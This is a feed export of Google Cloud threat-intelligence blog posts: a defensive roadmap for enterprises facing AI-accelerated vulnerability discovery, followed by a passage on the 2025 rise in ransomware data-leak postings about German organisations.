https://cloud.google.com/blog/topics/threat-intelligence/Threat IntelligenceenThu, 16 Apr 2026 14:32:23 +0000https://cloud.google.com/blog/topics/threat-intelligence/static/blog/images/google.a51985becaa6.pnghttps://cloud.google.com/blog/topics/threat-intelligence/https://cloud.google.com/blog/topics/threat-intelligence/defending-enterprise-ai-vulnerabilities/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Advances in AI model-powered exploitation have demonstrated that general-purpose AI models can excel at vulnerability discovery, even without being purpose-built for the task. Eventually, capabilities such as these will be integrated directly into the development cycle, and code will be more difficult to exploit than ever; however, this transition creates a critical window of risk. As we harden existing software with AI, threat actors will use it to discover and exploit novel vulnerabilities.</span></p> <p><span style="vertical-align: baseline;">Faced with this scenario, defenders have two critical tasks: hardening the software we use as rapidly as possible, and preparing to defend systems that have not yet been hardened.</span></p> <p><span style="vertical-align: baseline;">As noted in Wiz’s blog post, </span><a href="https://www.wiz.io/blog/claude-mythos" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Claude Mythos: Preparing for a World Where AI Finds and Exploits Vulnerabilities Faster Than Ever</span></a><span style="vertical-align: baseline;">, now is the time to strengthen playbooks, reduce exposure, and incorporate AI into security programs. The following blog provides an overview of the evolving attack lifecycle, how threat actors will weaponize these capabilities, and a roadmap for modernizing enterprise defensive strategies</span>.</p></div> <div class="block-aside"><dl> <dt>aside_block</dt> <dd>&lt;ListValue: [StructValue([(&#x27;title&#x27;, &#x27;Webinar: Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever&#x27;), (&#x27;body&#x27;, &lt;wagtail.rich_text.RichText object at 0x7fa47c18fb50&gt;), (&#x27;btn_text&#x27;, &#x27;Register now&#x27;), (&#x27;href&#x27;, &#x27;https://www.brighttalk.com/webcast/18282/666651?utm_source=gcs-blog&amp;utm_medium=blog&amp;utm_campaign=mythos&#x27;), (&#x27;image&#x27;, None)])]&gt;</dd> </dl></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Exploits in the Adversary Lifecycle</span></h3> <p><span style="vertical-align: baseline;">Historically, the discovery of novel vulnerabilities and the subsequent development of zero-day exploits required significant time, specialized human expertise, and resources. Today, highly capable AI models are increasingly demonstrating the ability to not only identify vulnerabilities but also help generate functional exploits, lowering the barrier to entry for threat actors. Continued advancements in these capabilities will increasingly make exploit development achievable for threat actors of all skill levels, significantly compressing the attack timeline. GTIG has already observed </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"><span style="text-decoration: underline; vertical-align: baseline;">threat actors leveraging LLMs for this purpose</span></a><span style="vertical-align: baseline;"> as well as the marketing of this capability within </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">AI tools and services advertised in underground forums</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">A significant shift in the economics of zero-day exploitation will enable mass exploitation campaigns, ransomware and extortion operations, and an increased volume of activity from actors who previously guarded these capabilities and used them sparingly.</span></p> <p><span style="vertical-align: baseline;">Accelerated exploit deployment is a trend we’ve already been observing among advanced adversaries. In our </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span style="text-decoration: underline; vertical-align: baseline;">2025 Zero-Days in Review</span></a><span style="vertical-align: baseline;"> report, we noted that PRC-nexus espionage operators have become increasingly adept at rapidly developing and distributing exploits among otherwise separate threat groups. This has significantly shrunk the historical gap between public vulnerability disclosure and widespread mass exploitation, a trend we expect to continue.</span></p> <p><span style="vertical-align: baseline;">This evolving landscape will almost certainly result in meaningful shifts over the coming year: </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vulns-ai-fig1.max-1000x1000.jpg" alt="shifts in evolving landscape"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Scaling Defenses for Machine-Speed Threats</span></h3> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">We have long anticipated that AI models would become capable of vulnerability discovery—which is why we’ve been using AI tools like </span><a href="https://blog.google/innovation-and-ai/technology/safety-security/cybersecurity-updates-summer-2025/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Big Sleep</span></a><span style="vertical-align: baseline;">, </span><a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CodeMender</span></a><span style="vertical-align: baseline;">, and </span><a href="https://bughunters.google.com/open-source-security/oss-fuzz" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">OSS-Fuzz</span><span style="vertical-align: baseline;"> to proactively find and fix vulnerabilities over the years</span></a>.</span></p> <p><span style="vertical-align: baseline;">Now as threat actors leverage AI to significantly multiply their offensive output, enterprise defenders cannot rely on human-speed patching protocols to keep up. When organizations are confronted with an AI-enabled surge in vulnerabilities, traditional security tooling and manual triage will fail to keep pace.</span></p> <p><span style="vertical-align: baseline;">Attempting to absorb this exponential increase in workload using legacy processes will result in severe overload and burnout for security and development teams. The question is no longer just about proactive scanning and adherence to traditional patching SLAs; it is about whether organizations are empowering their workforce with the automation needed to eliminate manual toil. To prepare for this reality, organizations must integrate AI defensively, shifting the role of the security practitioner from manual investigator to strategic coordinator.</span></p> <h3><span style="vertical-align: baseline;">A Modern, AI-Integrated Defensive Roadmap</span></h3> <p><span style="vertical-align: baseline;">In order to modernize the traditional vulnerability roadmap, organizations must incorporate automation and prioritize resilience. </span></p> <p><span style="vertical-align: baseline;">Organizations are no longer defending against purely human-speed exploitation. AI-enabled adversaries can identify, chain, and weaponize weaknesses faster than traditional vulnerability management programs were designed to respond. A modern roadmap should therefore emphasize <a href="https://cloud.google.com/security/consulting/mandiant-cybersecurity-transformation">automation, resilience, and continuous validation</a>.</span></p> <p><span style="vertical-align: baseline;">This roadmap is organized in two parts. The first outlines advanced modernization priorities for organizations that are ready to evolve their security programs to achieve defense at AI enabled speeds. The second provides foundational guidance for organizations that are still building core vulnerability management capabilities.</span></p> <h4><span style="vertical-align: baseline;">Advanced Modernization Priorities</span></h4></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vulns-ai-fig2.max-1000x1000.jpg" alt="modern defensive roadmap"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Secure Your Code</span><strong style="vertical-align: baseline;"> </strong></h5> <p><span style="vertical-align: baseline;">Organizations have historically focused on patching and securing tangible assets like laptops, servers, and network infrastructure. In today’s threat landscape, that same discipline must be applied to source code, code libraries, and the systems used to build and deploy it.</span></p> <p><span style="vertical-align: baseline;">Code repository platforms should be tightly protected and accessible only through trusted internal networks, managed identities, or other strongly controlled access paths. Organizations should proactively scan for secrets within their codebase that may be weaponized by adversaries and eliminate any practice of storing sensitive credentials in plaintext.</span></p> <p><span style="vertical-align: baseline;">Similarly, organizations are still accountable for vulnerable code from their supply chains, and they must proactively plan for and defend against attacks through exploitation of compromised code libraries. This creates a conflict with updating versions and repositories immediately against holding onto known and trusted versions.</span></p> <p><span style="vertical-align: baseline;">Accordingly, security controls should cover build runners, CI/CD pipelines, and other automated execution mechanisms, which are increasingly attractive targets for threat actors. AI-enabled scanning tools can help teams detect critical vulnerabilities faster and uncover groups of weaknesses that may appear minor on their own but could be chained together for exploitation. </span></p> <p><span style="vertical-align: baseline;">Organizations should leverage frameworks like </span><a href="https://www.wiz.io/blog/sitf-sdlc-threat-framework" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Wiz SITF</span></a><span style="vertical-align: baseline;"> to map their SDLC threat model and identify "attack chains" where minor, isolated weaknesses are combined by AI to create a critical breach. Additionally, one-time static or dynamic scanning is no longer sufficient. Organizations should deploy emerging commercial and open-source agentic solutions to review code and mitigate flaws before they can be exploited. </span></p> <h5><span style="vertical-align: baseline;">Move to Automated Security Operations</span></h5> <p><span style="vertical-align: baseline;">Traditional dashboards and static detection rules will struggle under the volume of automated attacks. Security operations need to become more dynamic, with a clear path toward an agentic SOC.</span></p> <p><span style="vertical-align: baseline;">Legacy models are often reactive and constrained by manual workflows, By deploying specialized AI agents such as Google Cloud’s Triage and Investigation Agent and Gemini in </span><a href="https://cloud.google.com/security/products/security-operations"><span style="text-decoration: underline; vertical-align: baseline;">Google Security Operations</span></a><span style="vertical-align: baseline;">, teams can automate alert triage, analyze suspicious code without manual reverse engineering, correlate signals across multiple tools, and generate response playbooks in real time. This allows analysts to spend less time on repetitive investigation and more time on high-value decisions, helping the SOC respond to AI-enabled attacks at AI speed.</span></p> <h5><span style="vertical-align: baseline;">Reduce Attack Surface </span></h5> <p><span style="vertical-align: baseline;">Organizations should design networks with a zero trust approach and focus first on reducing exposure across internet-facing systems, critical infrastructure, control planes, and trusted service infrastructure. </span></p> <p><span style="vertical-align: baseline;">Network segmentation and identity-based access controls should be in place so that if an edge device is compromised through a zero-day exploit, the blast radius is limited and easier to contain.</span></p> <h5><span style="vertical-align: baseline;">Maintain Continuous Asset Discovery and Posture Management</span></h5> <p><span style="vertical-align: baseline;">Unidentified assets are a major blindspot for organizations and a critical weakness that AI-enabled threat actors are able to exploit with increasing efficiency. Static spreadsheets and manual asset tracking are no longer a viable and scalable strategy.</span></p> <p><span style="vertical-align: baseline;">Security teams need a continuously updated, automated inventory covering endpoints, servers, public-facing systems, network infrastructure, AI systems, cloud environments and ephemeral assets like Kubernetes pods. Dynamic asset discovery is critical for reducing blind spots and shadow AI. The more seamlessly known assets can be fed into downstream security tooling, the more accurate and effective frontline detection and response will be.</span></p> <h5><span style="vertical-align: baseline;">Expand Automated Scanning Coverage</span></h5> <p><span style="vertical-align: baseline;">Automated vulnerability scanning should cover every major operating system in use, including Windows, macOS, and Linux, across both endpoints and servers.</span></p> <p><span style="vertical-align: baseline;">Reduce blind spots and maintain continuous, comprehensive visibility into vulnerabilities. Where possible, that visibility should feed directly into automated remediation pipelines.</span></p> <h5><span style="vertical-align: baseline;">Enhance Network Device Patching and Limit Connectivity</span></h5> <p><span style="vertical-align: baseline;">Organizations need a highly automated, repeatable process for identifying missing firmware and security updates on network devices and for scheduling maintenance efficiently. Network infrastructure has long been a preferred target for sophisticated threat actors, and AI will only accelerate the discovery of weaknesses in these often-overlooked systems.</span></p> <p><span style="vertical-align: baseline;">Organizations should use perimeter controls to block unnecessary outbound connections from internal network devices. Any attempt by those devices to communicate externally should be investigated to determine whether it is required for normal operations or signals something more concerning. Proactively, organizations should baseline what outbound connections are normal, in order to alert against anomalies.</span></p> <h5><span style="vertical-align: baseline;">Formalize Emergency Remediation SLAs</span></h5> <p><span style="vertical-align: baseline;">AI may help accelerate patching, but emergency response still depends on clear human processes.</span></p> <p><span style="vertical-align: baseline;">Organizations should define remediation SLAs based on severity, exposure, and asset criticality, and those expectations should be aligned across security, IT, and business stakeholders. When a vulnerability is being actively exploited in the wild, teams need a pre-approved, low-friction process to apply temporary mitigations, such as restricting public access or isolating affected systems, while permanent fixes are validated. Extremely critical business processes should each have secondary systems that can deliver the same objectives with different underlying technology. By having alternatives and fall backs for these processes, organizations give themselves more options to address emergency remediation while minimizing potential business disruption.</span></p> <h5><span style="vertical-align: baseline;">Secure AI Agents and Implement SAIF</span></h5> <p><span style="vertical-align: baseline;">As organizations deploy AI agents, they also create a new attack surface that must be protected.</span></p> <p><span style="vertical-align: baseline;">Organizations should adopt frameworks such as Google’s Secure AI Framework (SAIF) to guide the secure deployment of AI models and applications. Tools like </span><a href="https://cloud.google.com/security/products/model-armor"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud Model Armor</span></a><span style="vertical-align: baseline;"> or similar industry solutions can also serve as a protective layer for large language model environments by screening inputs and outputs for prompt injection, jailbreak attempts, and </span><a href="https://cloud.google.com/security/products/sensitive-data-protection"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud Sensitive Data Protection</span></a><span style="vertical-align: baseline;"> can prevent sensitive data leakage. Locking down connections that AI systems can establish such as MCP, with fine grained IAM roles is critical to prevent from insecure plugin use threats. </span></p> <p><span style="vertical-align: baseline;">Defensive AI systems cannot become another point of compromise, and they should be secured accordingly.</span></p> <h4><span style="vertical-align: baseline;">Foundational Vulnerability Management Priorities</span></h4> <p><span style="vertical-align: baseline;">Not every organization starts from the same baseline. The priorities above assume a relatively mature security program with established tooling, ownership, and operational capacity. For organizations with limited or inconsistent vulnerability management capabilities, the first step is to build a reliable foundation before pursuing advanced AI-enabled operating models.</span></p> <h5><span style="vertical-align: baseline;">The Current Reality of Vulnerability Management</span></h5> <p><span style="vertical-align: baseline;">Vulnerability management programs vary widely based on the maturity of an organization’s overall security program. In more mature environments, vulnerability management is highly automated: in-scope vulnerabilities are identified, routed to the appropriate IT, infrastructure, or application owners, and automatically validated once remediation is complete.</span></p> <p><span style="vertical-align: baseline;">In less mature environments, the opposite is often true. Vulnerability management may be inconsistent, narrowly scoped, and focused primarily on the highest-profile zero-days. Tracking may still rely on local spreadsheets, systems may be overlooked, and even trusted service infrastructure assets such as Active Directory domain controllers may remain unpatched.</span></p> <p><span style="vertical-align: baseline;">Such organizations need to immediately modernize and elevate their vulnerability management programs. Most organizations were already unable to remediate every vulnerability across their technology stack, and the rise of AI-enabled threats worsens that reality, increasing the urgency of building programs that are automated, measurable, tracked, and validated.</span></p> <p><span style="vertical-align: baseline;">Achieving that outcome is challenging. It requires coordination across the three foundational pillars of any security program: people, process, and technology. A prioritized and phased approach is outlined as follows.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vulns-ai-fig3.max-1000x1000.jpg" alt="vulnerability management priorities"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Foundation Step #1 — Baseline Current State</span></h5> <p><span style="vertical-align: baseline;">Begin with the tools, processes, and coverage already in place. Scan everything currently in scope, identify Critical and High findings, and remediate them according to agreed urgency and service levels. At the same time, establish a process for tracking vulnerabilities that are being actively exploited in the wild, along with the emergency patching actions they may require. This phase should also confirm that system owners have defined maintenance windows and the operational support needed to meet remediation SLAs.</span></p> <h5><span style="vertical-align: baseline;">Foundation Step #2 — Expand System Scanning Coverage</span></h5> <p><span style="vertical-align: baseline;">Broaden vulnerability scanning across all major operating systems in use, including Windows, macOS, and Linux, for both endpoints and servers. Additionally, expand coverage to include other network attached systems, including the network devices themselves.The objective is to reduce blind spots and ensure vulnerability visibility extends across the environment, rather than covering only isolated segments.</span></p> <h5><span style="vertical-align: baseline;">Foundation Step #3 — Confirm Asset Inventory and Ownership</span></h5> <p><span style="vertical-align: baseline;">Maintain a simple, accurate inventory of key asset classes, including endpoints, servers, public-facing systems, network infrastructure, and specialized devices such as medical equipment where applicable. Every asset should have a clearly defined owner responsible for remediation coordination, exception handling, and lifecycle accountability.</span></p> <h5><span style="vertical-align: baseline;">Foundation Step #4 — Establish Standard Program Reporting</span></h5> <p><span style="vertical-align: baseline;">Create a consistent reporting cadence that gives stakeholders a clear view of program health and risk. Reporting should include scanning coverage by asset class, top Critical and High vulnerabilities, public-facing exposure, patch compliance, SLA performance, and documented exceptions or risk acceptances. The goal is to produce reporting that drives decisions, not just dashboards that provide visibility.</span></p> <h5><span style="vertical-align: baseline;">Foundation Step #5 — Prioritize Public-Facing and High-Risk Vulnerabilities</span></h5> <p><span style="vertical-align: baseline;">Identify the attack surface and prioritize vulnerabilities affecting internet-exposed systems, critical infrastructure, and assets that present the highest likelihood of exploitation or business impact. Remediation should be tracked against defined deadlines, with clear escalation paths when timelines are at risk. Where possible, internet-exposed systems should be engineered for automatic patching.</span></p> <h5><span style="vertical-align: baseline;">Foundation Step #6 — Develop a Specialized Process for High-Sensitivity Devices</span></h5> <p><span style="vertical-align: baseline;">For device classes that require additional coordination, such as medical devices, industrial control systems, or other operational technology, create a streamlined process for identifying vulnerabilities, coordinating with vendors or support teams, and applying compensating controls when patching is not feasible. These assets often require a different remediation model than standard IT systems.</span></p> <h5><span style="vertical-align: baseline;">Foundation Step #7 — Formalize Remediation SLAs and Exception Handling</span></h5> <p><span style="vertical-align: baseline;">Define remediation SLAs based on severity, exposure, and asset criticality, and ensure they are understood across security, IT, and business stakeholders. Just as importantly, establish a formal exception process for situations where remediation cannot be completed within the required timeframe. Exceptions should be documented, risk-assessed, approved by the appropriate stakeholders, and reviewed on a recurring basis.</span></p> <h3><span style="vertical-align: baseline;">How Google Can Help</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">In today’s cybersecurity landscape, we’re not just defending against human attackers, but also against tactics supercharged by AI tools. To counter these machine-speed threats, Google provides a comprehensive, AI-integrated defensive ecosystem:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Google Threat Intelligence: </strong><span style="vertical-align: baseline;">To combat the unprecedented volume of AI-generated exploits,</span><a href="https://cloud.google.com/security/products/threat-intelligence"><span style="vertical-align: baseline;"> </span><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence</span></a><span style="vertical-align: baseline;"> enables a proactive 'assume breach' mentality. By fusing Mandiant’s codified frontline adversarial behaviors with Google’s global visibility of the threat landscape, security teams can move beyond static indicators to hunt for the subtle, non-linear behaviors characteristic of novel attacks. As both security noise and true threats escalate, the platform helps organizations better prioritize security resources based on active threats. By cutting through this growing noise to focus on what is truly important, security teams save time, ultimately empowering them to disrupt the adversary’s lifecycle long before they can reach their objective.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Mandiant Security Consulting Services: </strong><a href="https://cloud.google.com/security/solutions/mandiant-ai-consulting"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant AI Security Consulting Solutions</span></a><span style="vertical-align: baseline;"> can help organizations design and operationalize this architecture. This includes helping organizations speed the identification and remediation of vulnerabilities through code reviews, mature their secure software development lifecycles (SSDLCs), and modernize the overall vulnerability management programs to handle the anticipated influx of vulnerabilities with greater efficiency and resilience. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Agentic SecOps:</strong><span style="vertical-align: baseline;"> </span><a href="https://cloud.google.com/solutions/security/agentic-soc"><span style="text-decoration: underline; vertical-align: baseline;">Google SecOps</span></a><span style="vertical-align: baseline;"> provides the foundation for an agentic security operations center. This allows teams to augment workflows with agents, combining dynamic AI with deterministic automation. Users can embed agents like the Triage and Investigation agent directly into workflows to accelerate response times. This agent autonomously investigates alerts, gathers evidence, and provides verdicts with clear explanations. This enables automated decision-making and remediation, freeing analysts to focus on high-priority threats rather than false positives. Orchestrating responses becomes more efficient as friction is reduced. Additionally, customers can build enterprise-ready security agents with remote Model Context Protocol (MCP) server support. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Mandiant Threat Defense (MTD):</strong><span style="vertical-align: baseline;"> To augment internal teams, </span><a href="https://cloud.google.com/security/products/mandiant-managed-threat-hunting"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant Threat Defense</span></a><span style="vertical-align: baseline;"> leverages frontline intelligence and AI-enabled telemetry to proactively hunt for and disrupt advanced, machine-speed threats.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Wiz:</strong><span style="vertical-align: baseline;"> Organizations can maintain </span><a href="https://www.wiz.io/blog/claude-mythos" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">continuous asset discovery and dynamic posture management</span></a><span style="vertical-align: baseline;">, ensuring they can rapidly identify and reduce their attack surface across complex, multi-cloud environments.Wiz uses AI agents, powered by environmental context, to democratize security, prioritize remediation, and proactively reduce the attack surface. Wiz continuously integrates the latest AI models to streamline vulnerability detection and response, and its Model Context Protocol (MCP) server enables security teams to use Wiz’s deep context and risk analysis in agentic workflows. The foundational strategy of Wiz connects cloud, code, and runtime, and employs three key agents:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Shift Right (Red Agent): Scans the entire attack surface with an AI-powered attacker, using contextual information (cloud, workload, code analysis) to discover immediately exploitable risks.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Shift Left (Green Agent): Helps customers identify root causes (cloud-to-code) and automatically deploy fixes using pre-built Wiz skills, and upcoming integrations with CodeMender to self-heal code bases.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Detect and respond (Blue Agent): Automates the investigation of AI-enabled attacks at the speed of AI, allowing SOC teams to rapidly triage suspicious behavior and utilize runtime protection tools to detect exploitation.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Google Cloud Model Armor:</strong><span style="vertical-align: baseline;"> To secure the AI agents organizations deploy, </span><a href="https://cloud.google.com/security/products/model-armor"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud Model Armor</span></a><span style="vertical-align: baseline;"> acts as a specialized LLM firewall, proactively screening inputs and outputs to block prompt injections and sensitive data leaks. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Outlook and Implications</span></h3> <p><span style="vertical-align: baseline;">The cybersecurity community has the opportunity to serve as the voice of reason: the best response is proactive, disciplined preparation, not panic. While access to the publicly known, most capable frontier models is currently restricted to responsible actors, the availability of these technologies to a broader audience is inevitable. For defenders, this signals a surge in vulnerability management demands. The traditional window between a vulnerability’s disclosure and its active exploitation in the wild has already largely vanished; the primary concern now is the sheer number of exploits organizations will have to defend against simultaneously. Furthermore, the traditional concept of severity is shifting. In a landscape where AI agents can chain together multiple low-level vulnerabilities, the practical impact difference between a remote code execution (RCE) flaw and a seemingly benign local-only exploit is rapidly disappearing. </span></p> <p><span style="vertical-align: baseline;">To build on the foundational steps above, organizations can work with Mandiant to plan, prioritize, and implement an AI-enabled cyber defense strategy. AI gives security teams powerful new ways to understand their environments, automate remediation at scale, and strengthen workforce capabilities. By adopting AI-integrated defenses today, organizations can better prepare for the speed, scale, and sophistication of tomorrow’s adversaries.</span></p></div> <div class="block-paragraph_advanced"><h3>Acknowledgement</h3> <p>This post wouldn't have been possible without numerous experts across Mandiant and GTIG. We specifically would like to thank Omar ElAhdan, Chris Linklater, Austin Larsen, Jared Semrau, Dan Nutting, John Hultquist, and Kimberly Goody for their contributions to this blog post.</p></div>Thu, 16 Apr 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/defending-enterprise-ai-vulnerabilities/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/defending-enterprise-ai-vulnerabilities/Francis deSouzaMandiant and Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/europe-data-leak-landscape/<div class="block-paragraph_advanced"><p>Written by: Jamie Collier, Robin Grunewald</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Germany has reclaimed its position as a primary focus for cyber extortion in Europe. While data leak site (DLS) posts rose almost 50% globally in 2025, Google Threat Intelligence (GTI) data shows that the surge is hitting German infrastructure harder and faster than its regional neighbors, marking a significant return to the high-pressure levels previously observed in the country during 2022 and 2023.</span></p> <h3><span style="vertical-align: baseline;">Cyber Criminals Pivoting Back to Germany</span></h3> <p><span style="vertical-align: baseline;">Germany moved to the forefront of European data leak targets in 2025. Following a 2024 period where the UK led in DLS victims, this pivot reflects a resurgence of the intense pressure observed across German infrastructure during 2022 and 2023.</span></p> <p><span style="vertical-align: baseline;">This targeting is not a result of the overall number of companies within Europe, as Germany has </span><a href="https://www.hithorizons.com/eu/analyses/country-statistics" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">fewer active enterprises</span></a><span style="vertical-align: baseline;"> than France or Italy. Instead, its sustained appeal to extortion groups is driven by its status as an advanced European economy with an increasingly digitized industrial base.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig1.max-1000x1000.jpg" alt="Percentage of data leaks affecting European nations in 2025"> </a> <figcaption class="article-image__caption "><p data-block-key="w6qqr">Figure 1: Percentage of data leaks affecting European nations in 2025</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The speed of this escalation is particularly notable. Following a relative cooling of activity in 2024, Germany saw a 92% growth in leaks in 2025—a growth rate that tripled the European average.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig2.max-1000x1000.jpg" alt="The number of German victims listed in data leak sites grew 92% in 2025 compared to 2024"> </a> <figcaption class="article-image__caption "><p data-block-key="46qv7">Figure 2: The number of German victims listed in data leak sites grew 92% in 2025 compared to 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While several factors influenced European ransomware trends in 2025, a striking contrast emerged in leak volumes. While shaming-site postings for UK-based organizations cooled, non-English speaking nations (particularly Germany) witnessed a surge. This shift reflects a convergence of several factors. The continued maturation of the cyber criminal ecosystem, including the use of AI to automate high-quality localization, is further eroding the historical protection offered by language barriers. However, this "linguistic pivot" is also supported by a shift in victim profiles. As larger "big game" targets in North America and the UK improve their security posture or utilize cyber insurance to resolve incidents privately, threat actors appear to be pivoting toward the "ripe markets" of the German Mittelstand (discussed in further detail later in this post). </span></p> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) has also observed multiple cyber criminal groups post advertisements, seeking access to German companies and offering a proportion of any extortion fees obtained from victims. For example, dating back to November 2024, the threat actor known as Sarcoma has targeted businesses across several highly developed nations, including Germany.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig3.max-1000x1000.png" alt="A forum post by an actor seeking a partnership to target German victims"> </a> <figcaption class="article-image__caption "><p data-block-key="46qv7">Figure 3: A forum post by an actor seeking a partnership to target German victims</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While the 2025 data marks a record year for German leak volume, it is important to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape"><span style="text-decoration: underline; vertical-align: baseline;">contextualize these figures with a degree of caution</span></a><span style="vertical-align: baseline;">. Relying solely on DLS numbers can be misleading, as threat actors typically only post victims who refuse to initiate or complete extortion negotiations. Public reporting on the </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025#payments" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">decline in ransom payment rates</span></a><span style="vertical-align: baseline;"> may be partially fueling the steady increase in shaming site posts as a secondary pressure tactic. Consequently, while the surge in Germany remains a critical trend, these metrics should be viewed as one component of a broader, more complex threat landscape.</span></p> <h3><span style="vertical-align: baseline;">The Diversifizierung of the Cyber Criminal Ecosystem </span></h3> <p><span style="vertical-align: baseline;">2025 was characterized by significant turbulence in the cyber criminal ecosystem, driven by internal conflicts and aggressive law enforcement actions against dominant "big game" operations like LOCKBIT and ALPHV. The resulting vacuum at the top of the ransomware market has led to a more crowded field of agile, mid-tier DLS brands. In Germany, this rebalancing is highly visible: as established brands receded, a wider pool of competitors emerged to absorb the market share.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig4.max-1000x1000.png" alt="German victims on data leak sites rose sharply in 2025"> </a> <figcaption class="article-image__caption "><p data-block-key="5vw12">Figure 4: German victims on data leak sites rose sharply in 2025</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Following the disruption of LockBit, groups such as SAFEPAY and Qilin have gained significant prominence within the German landscape. SAFEPAY, in particular, claimed breaches of 76 German companies in 2025—accounting for 25% of all German victim posts that year. Meanwhile, Qilin tripled its operational tempo in Germany during Q3 2025. While this increase aligns with Qilin's broader global uptick in activity, their consistent focus on German targets (including 13 victims posted already in early 2026) demonstrates that their presence in the German landscape grows in lockstep with their global expansion.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img 